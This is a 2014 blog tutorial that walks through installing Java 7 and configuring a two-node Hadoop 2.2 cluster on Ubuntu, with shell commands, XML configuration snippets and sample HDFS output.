Wednesday, April 2, 2014

Hadoop 2.2 Multi Node Cluster Setup

 

In this tutorial you will learn how to set up a Hadoop multi-node cluster.



If you are using PuTTY to access your Linux box remotely, please install openssh-server by running the command below; this also makes it easier to configure SSH access later in the installation:
sudo apt-get install openssh-server


Prerequisites:

  1. Installing Java v1.7
  2. Adding dedicated Hadoop system user.
  3. Configuring SSH access.
  4. Disabling IPv6.

Before installing any applications or software, please make sure your list of packages from all repositories and PPAs is up to date; if it is not, update it with this command:
sudo apt-get update

Installing Java v1.7:

Hadoop requires Java v1.7 or later.
Download the latest Oracle Java (Linux x64) from the Oracle website using this command:
wget https://edelivery.oracle.com/otn-pub/java/jdk/7u45-b18/jdk-7u45-linux-x64.tar.gz
If the download fails, try the command below, which passes the required cookie so you do not have to provide a username and password:
wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "https://edelivery.oracle.com/otn-pub/java/jdk/7u45-b18/jdk-7u45-linux-x64.tar.gz"
Unpack the compressed Java binaries in the directory where you downloaded them:
sudo tar xvzf jdk-7u45-linux-x64.tar.gz
Create a Java directory under /usr/local/ by using this command:
sudo mkdir -p /usr/local/Java
Copy the unpacked Oracle Java binaries into the /usr/local/Java directory and change into it:
sudo cp -r jdk1.7.0_45 /usr/local/Java
cd /usr/local/Java
Edit the system PATH file /etc/profile and add the following system variables to your system path
sudo nano /etc/profile    or  sudo gedit /etc/profile
Scroll down to the end of the file using your arrow keys and add the following lines below to the end of your /etc/profile file:
JAVA_HOME=/usr/local/Java/jdk1.7.0_45
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
Inform your Ubuntu Linux system where your Oracle Java JDK/JRE is located. This will tell the system that the new Oracle Java version is available for use.
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/Java/jdk1.7.0_45/bin/javac" 1
sudo update-alternatives --set javac /usr/local/Java/jdk1.7.0_45/bin/javac
This command notifies the system that Oracle Java JDK is available for use
Reload your system wide PATH /etc/profile by typing the following command:
. /etc/profile
Test to see if Oracle Java was installed correctly on your system.
java -version
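If the JDK is on your PATH, the command should report the Oracle JDK; the exact build strings may differ, but the output should look roughly like this:
java version "1.7.0_45"
Java(TM) SE Runtime Environment (build 1.7.0_45-b18)
Java HotSpot(TM) 64-Bit Server VM (build 24.45-b08, mixed mode)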

Adding dedicated Hadoop system user.

We will use a dedicated Hadoop user account for running Hadoop. While this is not required, it is recommended because it helps to separate the Hadoop installation from other software applications and user accounts running on the same machine.
a. Adding group:
sudo addgroup hadoop
b. Creating a user and adding the user to a group:
sudo adduser --ingroup hadoop hduser
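To confirm that the account and group were created correctly (a quick sanity check, not part of the original steps), list the user's groups; the output should show hduser as a member of hadoop:
id hduser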

Configuring SSH access:

SSH key-based authentication is needed so that the master node can log in to the slave nodes (and the secondary namenode) to start and stop their daemons, and also to the local machine if you want to run Hadoop on it. We therefore need to configure SSH access to localhost for the hduser user we created in the previous section.
Before this step, make sure that SSH is up and running on your machine and is configured to allow SSH public key authentication.
Generating an SSH key for the hduser user.
a. Log in as the hduser user (e.g. sudo su - hduser)
b. Run this Key generation command:
ssh-keygen -t rsa -P ""
It will ask for the file name in which to save the key; just press Enter so that the key is generated at '/home/hduser/.ssh'.
Enable SSH access to your local machine with this newly created key.
cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
The final step is to test the SSH setup by connecting to your local machine with the hduser user.
ssh hduser@localhost
This will add localhost permanently to the list of known hosts
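If SSH still prompts for a password here, the most common cause is overly open permissions on the .ssh directory; tightening them (an optional troubleshooting step, assuming the default key location) usually fixes it:
chmod 700 $HOME/.ssh
chmod 600 $HOME/.ssh/authorized_keys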

Disabling IPv6.

We need to disable IPv6 because the 0.0.0.0 address used in various Hadoop configurations can resolve to an IPv6 address on Ubuntu. You will need to run the following command using a root (sudo) account:
sudo gedit /etc/sysctl.conf
Add the following lines to the end of the file and reboot the machine so that the settings take effect:
#disable ipv6
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
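After the reboot you can verify that IPv6 is really disabled; the following command should print 1 if the setting took effect:
cat /proc/sys/net/ipv6/conf/all/disable_ipv6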

 

Hadoop installation

Go to the Apache downloads page and download Hadoop version 2.2.0 (prefer a stable release).
Run the following command to download Hadoop version 2.2.0:
wget http://apache.mirrors.pair.com/hadoop/common/stable2/hadoop-2.2.0.tar.gz
Unpack the compressed hadoop file by using this command:
tar -xvzf hadoop-2.2.0.tar.gz
Move the Hadoop package to a directory of your choice; I picked /opt/hadoop-2.2.0 for convenience:
sudo mv hadoop-2.2.0 /opt/hadoop-2.2.0
Make sure to change the owner of all the files to the hduser user and hadoop group by using this command:
sudo chown -R hduser:hadoop /opt/hadoop-2.2.0
Add the following lines to the .bashrc file:
root@arrakis[~]#cd ~
root@arrakis[~]#vi .bashrc
Copy and paste the following lines at the end of the file:
export HADOOP_HOME=/opt/hadoop-2.2.0
export HADOOP_MAPRED_HOME=$HADOOP_HOME
export HADOOP_COMMON_HOME=$HADOOP_HOME
export HADOOP_HDFS_HOME=$HADOOP_HOME
export YARN_HOME=$HADOOP_HOME
export HADOOP_CONF_DIR=$HADOOP_HOME/etc/hadoop
export YARN_CONF_DIR=$HADOOP_HOME/etc/hadoop
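To make these variables available in your current shell without logging out again, reload .bashrc and check that HADOOP_HOME resolves (it should print /opt/hadoop-2.2.0):
source ~/.bashrc
echo $HADOOP_HOME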
Modify the Hadoop environment files.
Add JAVA_HOME to libexec/hadoop-config.sh at the beginning of the file:
root@arrakis[~]#vi /opt/hadoop-2.2.0/libexec/hadoop-config.sh
….
export JAVA_HOME='/usr/local/Java/jdk1.7.0_45'
….
Add JAVA_HOME to etc/hadoop/hadoop-env.sh at the beginning of the file:
root@arrakis[~]#vi /opt/hadoop-2.2.0/etc/hadoop/hadoop-env.sh
….
export JAVA_HOME='/usr/local/Java/jdk1.7.0_45'
….
Check Hadoop installation
root@arrakis[~]#cd /opt/hadoop-2.2.0/bin
root@arrakis[bin]#./hadoop version
Hadoop 2.2.0
…..
At this point Hadoop is installed on your node.
Create a folder for tmp:
root@arrakis[~]#mkdir -p $HADOOP_HOME/tmp
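If you created the tmp folder as root, also make sure hduser owns it, otherwise the namenode and datanode will not be able to write into it (same ownership convention as used above):
sudo chown -R hduser:hadoop /opt/hadoop-2.2.0/tmp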

Configuration: Multi-node setup

Add the IP addresses of the master and all slaves to /etc/hosts – on both the master and all the slave nodes.
Add the association between the hostnames and the IP addresses for the master and the slaves to /etc/hosts on all the nodes. Make sure that all the nodes in the cluster are able to ping each other.
hduser@arrakis:/opt/hadoop-2.2.0/bin#vi /etc/hosts
10.184.39.67 master
10.184.36.134 slave
In our case we only have one slave; if you have more slaves, name them slave1, slave2, and so on.
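A quick way to confirm the /etc/hosts entries are correct is to ping each node by hostname from the other (hostnames as in the example entries above):
hduser@arrakis:[~]#ping -c 2 slave
hduser@slave:[~]#ping -c 2 master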
Password-less ssh from master to slave
hduser@arrakis:[~]#ssh-keygen -t rsa -P ""
hduser@arrakis:[~]#ssh-copy-id -i /home/hduser/.ssh/id_rsa.pub hduser@slave
hduser@arrakis:[~]#ssh slave
[Note: If you skip this step, you will have to provide passwords for all slaves when the master starts the processes with ./start-*.sh. If you have configured multiple slaves, repeat the process for every slave node.]
Add the slave entries in $HADOOP_CONF_DIR/slaves – only on the master node.
Add all the slave entries to the slaves file on the master node:
hduser@arrakis:[~]#vi /opt/hadoop-2.2.0/etc/hadoop/slaves
 slave
Note: again, we only have one slave in this example; if you have more slaves, add all the slave hostnames.



Hadoop Configuration

On both the master and all the slave nodes

Add the properties to the following Hadoop configuration files, which are available under $HADOOP_CONF_DIR.
core-site.xml
hduser@arrakis[~]#cd /opt/hadoop-2.2.0/etc/hadoop
hduser@arrakis[hadoop]#vi core-site.xml
# Paste the following between the <configuration> tags
<property>
    <name>fs.default.name</name>
    <value>hdfs://master:9000</value>
  </property>
  <property>
    <name>hadoop.tmp.dir</name>
    <value>/opt/hadoop-2.2.0/tmp</value>
  </property>
hdfs-site.xml
hduser@arrakis[hadoop]#vi hdfs-site.xml
# Paste the following between the <configuration> tags
<property>
<name>dfs.replication</name>
<value>2</value>
 </property>
  <property>
<name>dfs.permissions</name>
<value>false</value>
</property>
Note: our replication value is 2 [one master and one slave]. If you have more slaves, set the replication value accordingly.
mapred-site.xml
hduser@arrakis[hadoop]#vi mapred-site.xml
# Paste the following between the <configuration> tags
 <property>
<name>mapreduce.framework.name</name>
<value>yarn</value>
</property>
yarn-site.xml
hduser@arakis[hadoop]#vi yarn-site.xml
# Paste the following between the <configuration> tags
<property>
    <name>yarn.nodemanager.aux-services</name>
    <value>mapreduce_shuffle</value>
  </property>
  <property>
    <name>yarn.nodemanager.aux-services.mapreduce_shuffle.class</name>
    <value>org.apache.hadoop.mapred.ShuffleHandler</value>
  </property>
  <property>
    <name>yarn.resourcemanager.resource-tracker.address</name>
    <value>master:8025</value>
  </property>
  <property>
    <name>yarn.resourcemanager.scheduler.address</name>
    <value>master:8030</value>
  </property>
  <property>
    <name>yarn.resourcemanager.address</name>
    <value>master:8040</value>
  </property>
Format the namenode – only on the master node:
hduser@arrakis:/opt/hadoop-2.2.0/bin#cd /opt/hadoop-2.2.0/bin
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hadoop namenode -format
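If the format succeeds, the output should end with a message similar to the following (the path reflects the hadoop.tmp.dir set earlier; exact wording may vary):
INFO common.Storage: Storage directory /opt/hadoop-2.2.0/tmp/dfs/name has been successfully formatted.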


Administering Hadoop – Start & Stop (only on the master node)

Start the processes on the master node – the slave node daemons will start automatically.
start-dfs.sh : to start namenode and datanode
hduser@arrakis:[~]# cd /opt/hadoop-2.2.0/sbin
hduser@arrakis:[sbin]# ./start-dfs.sh
check Master
hduser@arrakis:[sbin]#jps
 17675 Jps
 17578 SecondaryNameNode
 17409 NameNode
check Slave
hduser@slave:[sbin]#jps
 9317 Jps
 9250 DataNode
start-yarn.sh : to start resourcemanager and nodemanager
hduser@arrakis:[sbin]# ./start-yarn.sh
check Master
hduser@arrakis:[sbin]#jps
 17578 SecondaryNameNode
 17917 ResourceManager
 17409 NameNode
 18153 Jps
check Slave
hduser@slave:[sbin]#jps
 9317 Jps
 9250 DataNode
 9357 NodeManager
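To stop the cluster later, run the matching stop scripts from the same sbin directory on the master; they shut down the daemons on the slaves as well:
hduser@arrakis:[sbin]# ./stop-yarn.sh
hduser@arrakis:[sbin]# ./stop-dfs.sh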

Working with Hadoop

Execute these commands on the master:
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -mkdir -p /user/hadoop2
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -put /root/Desktop/test.html /user/hadoop2
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfs -ls /user/hadoop2
Found 1 items
-rw-r--r-- 2 root supergroup 225 2013-11-11 20:19 /user/hadoop2/test.html
check slave node
hduser@slave:/opt/hadoop-2.2.0/bin# ./hdfs dfs -ls /user/hadoop2/
Found 1 items
-rw-r--r-- 2 root supergroup 225 2013-11-11 20:19 /user/hadoop2/test.html
hduser@slave:/opt/hadoop-2.2.0/bin# ./hdfs dfs -cat /user/hadoop2/test.html
test file. Welcome to Hadoop2.2.0 Installation. !!!!!!!!!!!
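As a final check that both nodes are participating in HDFS, you can ask the namenode for a cluster report from the master; it should list the slave's datanode as a live node (a verification step, not part of the original write-up):
hduser@arrakis:/opt/hadoop-2.2.0/bin# ./hdfs dfsadmin -report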
